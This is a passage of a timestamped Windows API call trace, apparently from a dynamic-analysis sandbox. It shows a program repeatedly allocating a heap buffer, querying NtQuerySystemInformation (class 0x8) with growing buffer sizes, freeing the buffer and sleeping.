[0178.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.708] Sleep (dwMilliseconds=0x110) [0178.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.742] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.743] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.743] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.744] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.744] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.745] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.746] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.747] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.748] Sleep (dwMilliseconds=0x110) [0178.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.926] Sleep (dwMilliseconds=0x110) [0178.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0178.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0178.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0178.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0178.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0178.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0178.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0178.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0178.978] Sleep (dwMilliseconds=0x110) [0179.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.008] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.009] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.010] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.010] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.010] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.011] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.014] Sleep (dwMilliseconds=0x110) [0179.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.037] Sleep (dwMilliseconds=0x110) [0179.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.081] Sleep (dwMilliseconds=0x110) [0179.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.128] Sleep (dwMilliseconds=0x110) [0179.183] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.183] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.184] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.194] Sleep (dwMilliseconds=0x110) [0179.261] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.261] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.262] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.262] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.268] Sleep (dwMilliseconds=0x110) [0179.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.304] Sleep (dwMilliseconds=0x110) [0179.399] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.423] Sleep (dwMilliseconds=0x110) [0179.699] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.709] Sleep (dwMilliseconds=0x110) [0179.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0179.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0179.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0179.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0179.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.754] Sleep (dwMilliseconds=0x110) [0179.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0179.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0179.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0179.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0179.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 